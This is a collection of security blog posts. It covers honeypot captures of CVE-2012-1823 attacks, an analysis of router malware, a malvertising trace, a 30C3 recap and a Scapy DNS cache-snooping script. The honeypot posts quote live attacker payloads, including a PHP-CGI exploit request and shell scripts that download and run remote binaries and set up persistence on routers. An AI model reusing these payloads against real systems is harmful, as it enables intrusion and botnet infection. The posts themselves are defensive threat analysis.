Undead Security

To be taken with a pinch of salt

CVE-2012-1823 / BKO

| Comments

Glastopf

I’ve been watching my little Glastopf honeypot for a while now but it’s only recently become very useful. Lukas finally sat his butt down and put some time into the PHP sandbox so the attacks targeting the CVE-2012-1823 vulnerability were now more readable.

Previously I’d just see something like this in my logs

1
2014-03-13 01:01:21,335 (glastopf.glastopf) 222.92.253.142 requested POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

Where as now I’m seeing this:

1
2
3
4
5
6
POST //cgi-bin/php/index.php/cgi-binphp/cgi-binphp5/cgi-binphp-cgi/cgi-binphp.cgi/cgi-binphp4/phppathphp/phppathphp5/local-binphp/local-binphp5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Host: -h

<? system("killall -9 perl;killall -9 php;cd /tmp;wget ftp://199.71.214.66/bko -O /tmp/bko; curl -O ftp://199.71.214.66/bko -O /tmp/bko;fetch -U ftp://199.71.214.66/bko -O /tmp/bko;lwp-download ftp://199.71.214.66/bko -O /tmp/bko;perl /tmp/bko;rm -rf /mpbko*"); ?>

Admittedly this is a little cleaned up because of a little script I wrote, but the important bit is the little bit of PHP code at the end. Here we can see the attackers true intent.

BKO

So the attackers want to pull down a Perl script called “bko” via a couple of different methods. In my very limited research time on this, I’ve seen attacks from the following sources:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 2014-02-20 14:23:49 - 66.219.100.178
 2014-02-20 18:29:45 - 162.248.167.168
 2014-02-21 20:22:10 
 2014-02-22 21:39:22 - 203.101.179.28
 2014-02-23 12:20:22
 2014-02-23 15:33:06 
 2014-02-24 14:17:33 
 2014-02-24 16:41:27 
 2014-02-28 21:09:27 - 87.238.192.50
 2014-03-01 00:19:19 
 2014-03-01 06:29:31 
 2014-03-01 18:37:42 
 2014-03-02 19:34:30
 2014-03-03 15:56:07 
 2014-03-05 08:33:23 

Attacking Hosts:

203.101.179.28 | origin-as 9541 (203.101.179.0/24) | as-path 5413 1273 8529 38193 9541 | CYBERNET | CYBER INTERNET SERVICES (PVT.) LTD. (Pakistan, Punjab, Lahore)

162.248.167.168 | origin-as 55053 (162.248.160.0/21) | as-path 5413 6939 36493 55053 | CLOUD-10 | KW Datacenter (Canada, Ontario, Kitchener)

66.219.100.178 | origin-as 10843 (66.219.96.0/20) | as-path 5413 1299 209 22561 5778 10843 | AITNET-2 | Advanced Internet Technologies, Inc. (United States, Alabama, Hoover)

87.238.192.50 | origin-as 42730 (87.238.192.0/21) | as-path 5413 13237 25394 42730 | EVANZO-2010A | EVANZO e-commerce GmbH Infrastructure (Germany, Berlin, Berlin)

It’s a varied mix of attackers. I’m not going to make any assumptions as to the source or the intent, but looking at the script they download we can see that they probably want to launch some good old fashioned DDoS attacks. Yes, the command and control is done via IRC. At some point I may dig into this, but currently I can’t be asked.

The point here is that attackers are still using fairly simple methods and definitely old attacks. CVE-2012-1823…come now. Still, it’s clearly working or they wouldn’t be so actively scanning for it. Even more importantly, I’m hoping more people will use Glastopf and even contribute to the code base. It’s a great litte honey pot and a great source of intel for me. Even if that intel is fairly uninteresting in the grand scheme of things.

Peas out girl scout…

30C3 Summary of Awesomeness

| Comments

30C3 happened in Hamburg at the end of December 2013. I’d never been before so I was looking forward to it. Having never been or known that many people that have been, I had no preconceived ideas as to what I was in for. Little did I know that I’d learn stuff, write more code than I probably should at a conference and realise that you don’t have to mission to Las Vegas to experience a great conference.

The TL;DR version of this blog post is “Go to 31C3..it’ll rock your panties”

Interesting talks

So many interesting talks happened. The great thing about 30C3 is that if a talk is in German (which quite a few are), you don’t have to miss out on anything. You can pull up the translated stream and watch that or even listen in on the translation on your DECT phone. Yes, there is a GSM network running at 30C3. No, I probably wouldn’t connect to it with my stupid iPhone. Especially after watching ioerrors talk on Sunday/Monday.

Having access to the live stream was also awesome in that you never had to miss out on a talk if you were hacking away at something in another room. This happened to me a few times. And it also happened when the rooms filled up quickly. Thank god for the overflow to Saal 2 for the keynote is all I can say…

Anyway, talks..here’s what I caught and why I thought they were interesting. Most of them will be on the offical media page by the time you read this so pick them up there.

10 Years of Fun with Embedded Devices

This was a little dry for my liking. It was a good overview of the OpenWRT project over the last 10 years. Having never used the project it was cool to see how it evolved over the years.

Electronic Bank Robberies

This was a very interesting talk up until the time I got kicked out of the isle. While it wasn’t new tech or anything, it was interesting to see how the malware authors were attacking ATMs. All it really proved was the physical access beats everything.

Greenwald Keynote

The highly anticipated keynote for 30C3. Saal 1 filled up very quickly so we managed to get a seat at the back of Saal 2. Glenn Greenwald gave a very interesting talk about the whole Snowden / NSA incident. It was great to hear that things like GPG/PGP are starting to catch on outside of our circles. The passion and dedication shown by Glenn and his colleagues left me with a little more hope for humanity than before 30C3. I suggest that you watch this.

Hillbilly Tracking of Low Earth Orbit

Very interesting talk by Travis on tracking satellites (I think). Travis has been doing awesome stuff with satellites and radio stuff for longer than I’ve had a drinking problem. You should also check out PoC||GTFO.

My journey into FM-RDS

Really interesting talk by Oona. She described how she discovered a signal while listening to her radio one evening. She then reversed said signal and discovered some awesomeness behind it. While I’m not very into the SDR/radio side of things, it was a very interesting talk. The way it was delivered was also great. Very understated with some rather awesome sauces just dropped without the usual flashy showmanship you usually expect with something like this. Must be a Scandianvian thing :)

FPGA 101

I was hoping for a little more from this talk. I’m putting my lack of enthusiasm for this talk down to a lack of Mate at that particular time. Really it was a good talk about FPGA’s. I’ll probably catch the recording again just to make sure…

The Year in Crypto

Moral of this story, don’t put crypto talks late at night when people have been up most of the night before…

I will catch the recording of this talk again as it’s something I’d like to learn more about.

SCADA StrangeLove 2

A buddy said I should watch this. It was a pretty interesting talk on SCADA stuff but I got the feeling that it was a little too much “look how awesome we are” more than anything…but by this time I was fairly grumpy. I’m not a nice person when I’m grumpy.

RFID Treehouse of Horror

This was a great talk on the use and abuse of RFID in Austria. The speaker gave a good overview on how we got to this point. The information on the tech involved was great. I’ve been tinkering with RFID for a while and this talk definitely gave me a few ideas that should help me get over some of my own hurdles.

X Security

Another talk suggested by a buddy (damn you BSB). This was an interesting talk on X security. We’ve long known that there are bugs in software. The speaker just showed that the situation is a little worse in X :)

To Protect And Infect (part one)

A pretty good talk on the use of malware by nation states. I got the feeling that there wasn’t anything new here. It seemed to be a rehash of what they had already showed in previous blog posts and the like. Again, grumpy…

Virtually Impossible: The Reality Of Virtualization Security

I need to review this post. Mostly because it affects me directly. As it does the OpenSSL project it seems.

OpenSSL

CounterStrike

What I caught of this talk was pretty good. Unfortunately a dinner run was made right in the middle so I missed a vast portion of the good bits.

Through a prism, darkly

This was probably one of the best talks I’d seen on the whole NSA thing. Other than @ioerror’s of course. The speaker gave a great overview of all the TLA’s, tech and laws involved in the NSA shit pie. If you’re looking for an overview from a law and tech point of view, I’d definitely review this talk.

All in all there was a great cross section of talks. Not many other conferences cater for the various types of hackers that turn up at events like this. And let’s not even talk about the workshops. I didn’t manage to make it to any of them but there were a couple that I’d like to have made had there not been something else on at the same time.

Shit BSB says…

BSB posed a simple question to me at some point during the conference. I say simple, but given that we’d all been up for a silly amount of time and were now powered mostly by a heady mixture of Mate, beer and chilli, it was anything but. But I digress…

The question he posed was “what was the best 5 minutes of the conference for you ?” That was a bit of a toughie for me, but I can definitely say there were a few moments when something either clicked, made me laugh or some such shenanigans

* Jason the SCADA guy - "hey..I this malware sample" "opens IDA" "mass reversing ensues"
* Secret beers and talking satellites and hardware with [fbz](https://twitter.com/fbz) and Travis Goodspeed while drinking delicious IPA
* The "how do I get RFID tag samples quickly and easily" moment...just build something simple and send it back to yourself :)
* The 8km of pneumatic tube system for shooting coloured flashy bottles all over the conference
* Heading somewhere at 3am and seeing a huge mob of people still swarming around doing stuff. 

Shit ioerror says…

So this happened I really suggest you watch the video here and make up your own mind. Ian Amit also made a good point here.

I’m still trying to process this, but it’s definitely a game changer. I just hope that it gains traction out of our circles. I fear that, while we as a community are very angry and could make changes, the rest of the world may not care enough. Or want to make the necessary changes to improve things. But this is probably a conversation for another day.

Assemblies

This was a new concept for me. It’s probably a thing at DefCon and the other US conferences, but it’s the first time I’ve seen it in such scale. Throughout the conference areas there were tables setup for groups or assemblies of people. Our little hackerspace had a table as did many others. The idea was that if you had a group of people you could get yourself a table and some internet access. This mean you had a little “home base” to come and go from. This was great as you had a comfy place to sit and hack on stuff if and when the need arose. There were so many different assemblies that I stopped trying to keep track of them all. The guys making alcoholic slushies proved very popular on Saturday night for instance. If you come through to 31C3, I’d recommend getting a group of people together and getting yourself a table and network together…it does help.

Miscellaneous

I couldn’t get anywhere near the large lock pick village/assembly for the vast majority of the weekend. This is both awesome and mildly annoying. Awesome in that so many people wanted to learn more about lock picking and get some much needed practice time in. Not so awesome in that I wanted to be one of these people but never managed it.

Flora Mate is a great alternative to regular Mate. I’d like to have had Mui Mui (I think) Mate, but I haven’t found it outside of Marburg :(

IceFloor for OS X is a gigantic pain in the ass. Yes, I should really just use PF, but fuck it…

Wrap Up

I learned stuff. I felt like I know nothing about computer security. I learned more stuff. More than anything, 30C3 showed me what we as a community of people can do when we put our minds to it. It inspired me (as many of the conferences I have gone to before have) and probably made me think a little bit more about what I’ve been doing and what I should be doing. Mostly I know that I really want to spend more time doing real infosec work, helping where I can and teaching others if I have something to share.

At this point I should probably sign off. It’s been an awesome few days and I need to catch up on some much needed rest before we mission back to real home base. (Note to self, next year…fly or catch a train. The truck is no way to travel long distances).

So thanks to @fbz, @blackswanburst, @travisgoodspeed, @ioerror, @Nickf4rr, @windyoona, @pinkflawd, secret IPA and the @hackeriet crew. There’s a bunch of other people but these guys and girls made the con for me.

Oh and thanks to CTP and the guy who runs Krypton Security for the great dinner at The Bird after closing ceremonies. Great food, card tricks and general hackerynessness.

Finally, go here, download the PDFs and enjoy :)

I know I’ve forgotten stuff and people and things. 30C3 was just that awesome.

Also. Fuck German minimal house. Fuck it hard.

Interesting ARM/MIPS Malware Sample

| Comments

It’s usually all quiet for my little honeypot in Internetland. But every now and again something interesting will come through. This would definitely be one of those times. I started writing this post at 30C3 simply because someone was gracious enough to sit with me and actually reverse the files I pulled from this attack. He gave me a couple of ideas for what the sample could be, but until we can actually pull out the C&C communications or the second stage payload, this will all be speculation. As you will see when you read this post there is a lot of speculation on what’s happening. I’m hoping this will be the first part in a series as I dig into this malware sample.

The Attack

A user from 186.47.114.23 logged into my pot in the middle of December with the username and password combination “root / admin”. Here’s the session recording:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~# shell
bash: shell: command not found

~# cd /var/run
-bash: cd: /var/run: Not a directory

~# wget http://bnry.jorgee.nu//wgsh
--2013-12-15 15:09:40--  http://bnry.jorgee.nu//wgsh
Connecting to bnry.jorgee.nu:80... connected.
HTTP request sent, awaiting response... test ! -e wgsh && busybox wget http://bnry.jorgee.nu///bbsh
sh wgsh
sh bbsh
200 OK
Length: 494 (494bytes) [text/plain; charset=ISO-8859-1]
Saving to: `wgsh

100%[======================================>] 494          0K/s/s  eta 0s

2013-12-15 15:09:42 (0 KB/s) - `wgsh' saved [494/494]

IP / Domain analysis

Using the Virustotal API I was able to glean this information for the domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Checking IP: bnry.jorgee.nu
Message: Domain found in dataset

Passive DNS report for: bnry.jorgee.nu

IP Address: 176.9.51.229  Last seen: 2013-09-22 00:00:00

Detected URLS

URL Detected: http://bnry.jorgee.nu/cron/
\_-> Evilness: 3/51 Scan date: 2013-11-28 21:16:25
URL Detected: http://bnry.jorgee.nu/.cpan_root
\_-> Evilness: 3/51 Scan date: 2013-11-28 21:16:25
URL Detected: http://bnry.jorgee.nu/
\_-> Evilness: 2/50 Scan date: 2013-11-04 01:35:20
URL Detected: http://bnry.jorgee.nu/cron
\_-> Evilness: 2/39 Scan date: 2013-08-29 22:09:59

Looking at the dates of the evilness, we can see that it’s been around for a while. The IP address is different, but that’s no real surprise.

The two IP addresses (218.154.164.110 & 176.9.51.229) found in the VT dataset didn’t reveal anything interesting. I should really get my IPInfo.py script up and running again…

Analysis of the initial payload

So they’re going to wget a file, but the strange thing for me was the “busybox wget…” part. I’ve not seen this before. After chatting with some folks who are a lot more intelligent than me as well as reviewing the file types that were downloaded, it seems that this malware was perhaps intended for a router or switch or some such embedded device. That may or may not explain the “busybox wget” shenanigans…

Here’s the contents of “wgsh” which is a simple shell script file.

1
2
3
4
5
6
7
8
9
10
11
12
13
wget http://bnry.jorgee.nu/bin/tty0 && chmod 700 tty0 && ./tty0 &
wget http://bnry.jorgee.nu/bin/tty1 && chmod 700 tty1 && ./tty1 &
wget http://bnry.jorgee.nu/bin/tty5 && chmod 700 tty5 && ./tty5 &
nvram set rc_firewall="sleep 120
wget http://bnry.jorgee.nu/nvr -P /tmp
sh /tmp/nvr
sleep 172800
reboot"
nvram commit
echo "/etc/persistent/cron" > /etc/persistent/rc.postsysinit
wget http://bnry.jorgee.nu/cron -P /etc/persistent && chmod 700 /etc/persistent/cron
cfgmtd -w -p /etc/
rm -rf wgsh

So the script attempts a bunch of downloads and then some fun stuff with those downloaded files.

Here’s the “file” output for the files that were downloaded

1
2
3
4
5
6
7
cron:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
init:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nvr:       ASCII text, with CRLF line terminators
sys:       ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty0:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty5:      ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

Strangeness

Before we did into this, what was more interesting was that a couple of days after this initial attack, I had a repeat visit. The attack was the same only the downloaded file was slightly different. Here’s the diff…

1
2
3
4
5
6
7
8
1,3c1,3
< wget http://bnry.jorgee.nu/bin/tty0 && chmod 700 tty0 && ./tty0 &
< wget http://bnry.jorgee.nu/bin/tty1 && chmod 700 tty1 && ./tty1 &
< wget http://bnry.jorgee.nu/bin/tty5 && chmod 700 tty5 && ./tty5 &
---
> wget http://bnry.jorgee.nu/bin/tty0 -P /var/run && chmod 700 /var/run/tty0 && /var/run/tty0 &
> wget http://bnry.jorgee.nu/bin/tty1 -P /var/run && chmod 700 /var/run/tty1 && /var/run/tty1 &
> wget http://bnry.jorgee.nu/bin/tty5 -P /var/run && chmod 700 /var/run/tty5 && /var/run/tty5 &

Seems someone made a quick fix to the script file as it may have failed. Either that or they didn’t notice that the “cd /var/run” command failed in their first stage script. I wonder if this was just a generic fix or if someone actually checked the output from their initial attack and made adjustments accordingly.

Onward to scripting shenanigans

Looking at the script file “nvr”, we have a couple of commands I’m not too familiar with. One of the commands also highlights why this script probably failed…IF it errors out like I think it would…

1
2
3
4
5
nvram set rc_firewall="sleep 120
wget http://bnry.jorgee.nu/nvr -P /tmp
sh /tmp/nvr
sleep 172800
reboot"

Would this script work ? Looking at it, I’d say no because of the broken inverted comma thing. But having never seen this command before, I could be wrong. It’s at this point of writing this blog post that I reach for a Flora Mate and do a little digging on the nvram command…

A quick Google search for “nvram set rc_firewall” brings up the DD-WRT wiki page which could give an indication as to what the Malware sample was looking for…

I’d say that this little piece of awesomeness is an attempt at persistence on the affected device. It’s going to add a little bit of scripting to the rc_firewall. The script will download and run the three files mentioned previously, sleep for a while and then reboot, every time the box/server/device boots. It’s also a little sneakier than saving to rc_startup (if I understand this correctly), which is probably what a savvy tech would look at first when troubleshooting / performing incident response.

Looking at the next couple of lines in our script we get

1
2
echo "/etc/persistent/cron" > /etc/persistent/rc.postsysinit
wget http://bnry.jorgee.nu/cron -P /etc/persistent && chmod 700 /etc/persistent/cron

This is plainly an attempt at persistence on the device. Unfortunately the “cron” file is stripped and encoded (more on this later) so getting the actual payload for the file is going to be tough.

The last couple of lines

1
2
cfgmtd -w -p /etc/
rm -rf wgsh

are finishing things up. The cfgmtd command will write the changes to /etc to flash and allow the device to be rebooting without things going too horribly wrong. I’m not entirely sure why they did this after the first “nvram commit”. Perhaps to separate the two attempts at persistence. Finally the attackers remove any trace of their initial infection.

The downloaded files

Unfortunately I can’t really give too much information on the downloaded files as the reversing done on them was definitely above my pay grade. I’ll see if the guy who did the grunt work is keen to give a little more information…

Again…

1
2
3
4
5
6
cron:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
init:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
sys:       ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty0:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty5:      ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

And file sizes…

1
2
3
4
5
6
-rw-r----- 1 matt users 45232 Dec 18 04:29 cron 
-rw-r----- 1 matt users 16772 Dec 18 04:28 init
-rw-r----- 1 matt users 42212 Dec 18 04:29 sys
-rw-r----- 1 matt users 16748 Dec 18 04:26 tty0
-rw-r----- 1 matt users 45228 Dec 18 04:26 tty1
-rw-r----- 1 matt users 42184 Dec 18 04:27 tty5

Looking at the file sizes I’d say that this is the relationship….

1
2
3
tty0 <-> init
tty1 <-> cron
tty5 <-> sys

And of course hashes…

1
2
3
4
5
6
183b4579e1d448c0c6533c851ed8b959  cron
83ac4c0b49fdf37e99d0368a8ea17dfa  init
58caa788562e2599ca3b4358fde59e80  sys
0019e3d469ba61f8b925b1c8599dccc6  tty0
1217d1400648c64181c891e4a187f079  tty1
270d3b9b7c8a37d0ead112c67e274619  tty5

I should probably run these files through ssdeep…

Pushing the files through strings doesn’t yield anything interesting. The fact that they’re stripped doesn’t help at all either. The guy who helped with the reversing mentioned a couple of things (I’m paraphrasing here):

* The files aren't packed even though at first glance it seems like it
* There is a "second stage" ELF file hidden inside the first ELF file. A not so simple 
  shifting scheme is hiding them from analysis. 
* The second stage is likely the same size at the memory space allocated by the original ELF

This was the interesting part for me. It looks to me like the authors are hiding the good stuff inside the existing ELF binary much as you would do with a secondary infector/payload in the resources section of a PE file. Why they didn’t just pack it is beyond me currently. The reversing done on these files was quick and dirty between dinner and talks at 30C3 so it’s definitely not a complete pass. The reverser mentioned that with a couple of well placed breakpoints and a debugger, you could get to the payload of the files. Unfortunately neither of us had an ARM or MIPS based system with a debugger setup and ready to go. I may see if I can do something with my Raspberry Pi tomorrow…

In summary (sort of)

I’d say the malware here is possibly something looking to infect and stay on a router or switch out there on the Internet. With all the files that were involved it’s likely that this wasn’t the only intention of the malware. I’d be very surprised if there wasn’t a DNS redirection payload involved. Hopefully someone will be able to dig out the payload from the files and complete the picture.

Comics Lead to Malware

| Comments

I was catching up on my daily comics after work this evening when something popped up on screen that I wasn’t quite expecting. I was using my Nexus 7 at the time which doesn’t have Ad Block installed for some stupid reason. I should probably look at securing this bad boy a little more.

Summary

The first thing I did was look at the two domains that the malicious ad (this is what I am assuming caused these shenanigans) talked to.

* appdownloader.info
* lovelinks.us

Cool. Let’s not dig into that too quickly. Let’s first do a little look up on the IP addresses for these hosts.

* appdownloader.info -> 178.63.45.183
* lovelinks.us -> 69.4.227.12

Thankfully I’ve just finished writing a little code to talk to Virus Total so I’ll use their service to do a little look up for these two IP addresses.

178.63.45.183

whob -gnp (Nothing interesting from Team Cymru whois service :( )

1
178.63.45.183 | origin-as 24940 (178.63.0.0/16) | as-path 3130 1239 3356 24940 | AVAZU-INC | Avazu Inc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
actually8.info
adtracking.mobi
appdownloader.info
blog.3g.de
concern8.info
cram8.info
hubs8.info
iphoneohnevertrag.de
mediaplayer-download888.net
mobiworld888.com
nevertheless8.info
pageerror-download.com
plenty8.info
related8.info
remembered88.info
required88.info
teebikhealth.com
turning8.info
weekly-gadget-winner.net
www.nevertheless8.info
www.turning8.info

That’s a whole bunch of hostnames associating with this IP address. There’s an even larger list of detected URL’s associated with the IP address. Here’s a simple snipped from the VT report

1
2
3
http://related8.info/lps/flvupdate.php?campaignid=9842176    (Evilness: 1/39 [Scan date: 2013-06-13 20:23:45])
http://turning8.info/lps/flvupdate.php?campaignid=5816578&czid=yxzhenu1ode2ntc4mq==&subid=nym1ci3wn7lz8fbzlracgkvygljgonpseigb&pubid=&lang=en&at=0    (Evilness: 1/37 [Scan date: 2013-06-05 18:45:21])
http://concern8.info/lps/flvplayer.php?campaignid=4817781&czid=YXZhenU0ODE3NzgxMQ==&subid=&pubid=&lang=en&at=0    (Evilness: 3/39 [Scan date: 2013-05-16 20:27:27])

I’d say there’s definitely something fishy going on with this IP address. So let’s have a look at the other IP address…perhaps there’s something there.

69.4.227.12

whob -gnp (Nothing interesting from Team Cymru whois service :( )

1
69.4.227.12 | origin-as 36351 (69.4.226.0/23) | as-path 7660 4635 36351 | HOSTINGSERVICES-INC | Hosting Services, Inc.

Here’s the full output from my tool…

1
2
3
4
5
6
7
8
9
10
11
12
Checking IP: 69.4.227.12
Message: IP address found in dataset

Passive DNS report for: 69.4.227.12

Hostname: lovelinks.us    Last seen: 2013-11-20 00:00:00
Hostname: tiantiankutao.com   Last seen: 2013-11-20 00:00:00

Detected URLS

URL Detected: http://lovelinks.us/    (Evilness: 1/51 [Scan date: 2013-12-19 22:51:27])
URL Detected: http://lovelinks.us/gray/mobo/mobo.php  (Evilness: 1/51 [Scan date: 2013-12-19 16:10:11])

Definitely badness happening on these two IP addresses. Unfortunately the domain information for the two domains in question is a little less useful.

So what’s next ? Let’s fire up a Thug instance and find out if there’s something fun like an exploit kit or unicorns lurking behind these URLS.

http://lovelinks.us/gray/mobo/mobo.php

1
2
3
4
5
6
7
8
9
window open redirection] about:blank -> http://lovelinks.us/gray/mobo/mobo.php
[HTTP] URL: http://lovelinks.us/gray/mobo/mobo.php (Status: 200, Referrer: None)
[HTTP] URL: http://lovelinks.us/gray/mobo/mobo.php (Content-type: text/html, MD5: b15a42594852ea1d8e74c7a15c60f9c9)
[HREF Redirection (document.location)] Content-Location: http://lovelinks.us/gray/mobo/mobo.php --> Location: http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all
[window open redirection] http://lovelinks.us/gray/mobo/mobo.php -> http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all
[HTTP Redirection (Status: 302)] Content-Location: http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all --> Location: http://app.appsflyer.com/com.mobogenie.markets?pid=mundomedia_int&c=mobogenie&clickid=bca89ef05128a49a627ed6450ea1bedc&af_siteid=CD13939&campaignid=e2c4w2b4e4t223
[HTTP] URL: https://play.google.com/store/apps/details?id=com.mobogenie.markets&referrer=af_tranid%3DBR3AAM7KS4W9ESM%26clickid%3Dbca89ef05128a49a627ed6450ea1bedc%26c%3Dmobogenie%26af_siteid%3DCD13939%26pid%3Dmundomedia_int%26campaignid%3De2c4w2b4e4t223 (Status: 200, Referrer: http://lovelinks.us/gray/mobo/mobo.php)
[HTTP] URL: https://play.google.com/store/apps/details?id=com.mobogenie.markets&referrer=af_tranid%3DBR3AAM7KS4W9ESM%26clickid%3Dbca89ef05128a49a627ed6450ea1bedc%26c%3Dmobogenie%26af_siteid%3DCD13939%26pid%3Dmundomedia_int%26campaignid%3De2c4w2b4e4t223 (Content-type: text/html; charset=utf-8, MD5: 44aa3b0d8eda3b69083cd49c2e8c3bac)
[Navigator URL Translation] local("Roboto Thin"), local("Roboto-Thin"), url(//ssl.gstatic.com/fonts/roboto/v10/PP2U5prMl9yvKSWVu6DtvPesZW2xOQ-xsNqO47m55DA.eot) format("embedded-opentype"), url(//ssl.gstatic.com/fonts/roboto/v10/vzIUHo9z-oJ4WgkpPOtg1_esZW2xOQ-xsNqO47m55DA.woff) format("woff") --> https://play.google.com/store/apps/local("Roboto Thin"), local("Roboto-Thin"), url(//ssl.gstatic.com/fonts/roboto/v10/PP2U5prMl9yvKSWVu6DtvPesZW2xOQ-xsNqO47m55DA.eot) format("embedded-opentype"), url(//ssl.gstatic.com/fonts/roboto/v10/vzIUHo9z-oJ4WgkpPOtg1_esZW2xOQ-xsNqO47m55DA.woff) format("woff")

Nope. No exploit kits here. To me it just looks like a Google Play link. Probably to something less than useful in the Google Store for Android. If you take a look at the one screen shot we can definitely see that the attackers want us to head over to the store.

GooglePlay

So it’s not a direct malware file, but still something definitely a little shady. And this ladies and gentlemen, is why you run advert blocking software. Thanks Cyanide and Happiness.

DNS Cache Snooping in Scapy

| Comments

Since giving the Scapy workshop at Brucon and Hack.lu earlier this year, I’ve been giving some thought to using tool for something other than just learning. Perhaps even using it to rewrite some existing tools so I can learn how stuff works a bit better behind the scenes.

Recently I read this post from SANS which illustrated how an attacker would use DNS queries made against a server to launch phishing attacks and the like against users of that DNS server. With all the use of watering hole attacks these days, I thought I’d try my hand at writing a script to do what the NMAP script in the post did.

So I put together a little bit of Scapy that made a non recursive DNS query against a DNS server of the users choice. The script would take a file containing hostnames and query those against the server in question. My thinking is if the host had been cached we’d get a response. If not, the DNS server would have to perform a recursive query to get the answer. In the code I’ve said that I don’t want recursive queries (rd=0). I’ve also put in an ugly little hack to weed out responses from the root servers.

For some reason I’m getting responses saying that all my hosts are cached. Even when I put in lookups for hosts that I know aren’t or shouldn’t be in the cache. So one of two things is happening here. One…my code is wrong which is entirely likely. Or two, my DNS server is ignoring my don’t recurse option and doing lookups anyway. I need to do a little more reading on DNS and probably look a little closer at my code. I’m also getting ICMP destination unreachable packets being sent from my machine to the DNS server. I wanted to assume it’s because of the lack of a handshake, but this is UDP so that theory is out the window. The strange thing is that it only seems to happen after host lookups for hosts that should be cached…

That said, I’d love some feedback from people who know more about this than me. I’m a little rusty on this sort of thing. Drop me your thoughts and comments via @undeadsecurity or email

Here’s the pcap.

Here’s the code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/python
# DNS Cache snooping with Scapy

import argparse
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

def dnssnoop(adomains, aresolver):
    """Check the server for hosts in our list"""

    domains = open(adomains, 'r')
    for host in domains:
        nhost = host.rstrip('\n')    
        dnsquery = sr1(IP(dst=aresolver)/UDP()/DNS(rd=0,qd=DNSQR(qname=nhost)),verbose=0)
        if "root-servers" in dnsquery[DNSRR].rdata:
            print "Not cached: %s" % nhost
        else:
            print "Cached: " + dnsquery[DNSRR].rrname + "\t\t\tResponse: " + dnsquery[DNSRR].rdata
    domains.close()

def __main__():

    parser = argparse.ArgumentParser(description='dns cache snooping', usage='%(prog)s -d domains.txt')
    parser.add_argument('--domains', '-d', dest='domains', help='file with domains to check')
    parser.add_argument('--resolver', '-r', dest='resolver', help='DNS server to use')
    parser.add_argument('--version', '-v', action='version', version='%(prog)s 0.1')
    args = parser.parse_args()
    adomains = args.domains
    aresolver = args.resolver

    if not args.domains and not args.resolver:
        sys.exit(parser.print_help())

    dnssnoop(adomains, aresolver)


if __name__ == '__main__':
    __main__()

Archives Online

Archive Dot Zonbi Dot Org

After much faffing about and hair pulling I’ve laid my attempts to migrate my old blog (Wordpress based) across to the new format to rest. Some of the scripts that were out there for this process kind of worked, but there simply wasn’t enough data to continue with the migration. And there’s no way I’m going to rewrite all them again :)

So without any further ado, my old posts and rants are available for your perusal here.

Yes, it’s a Wordpress instance, which is just asking for trouble, but I figure, what the heck…scanners are gonna scan.

ISSA DFIR Challenge

| Comments

This has been sitting in my TODO list for far too long. A challenge was posted here a while back and I thought I’d take a look at it. This is a very quick and dirty look at the challenge on a rainy Sunday afternoon.

Three files were posted along with a series of questions:

1
2
3
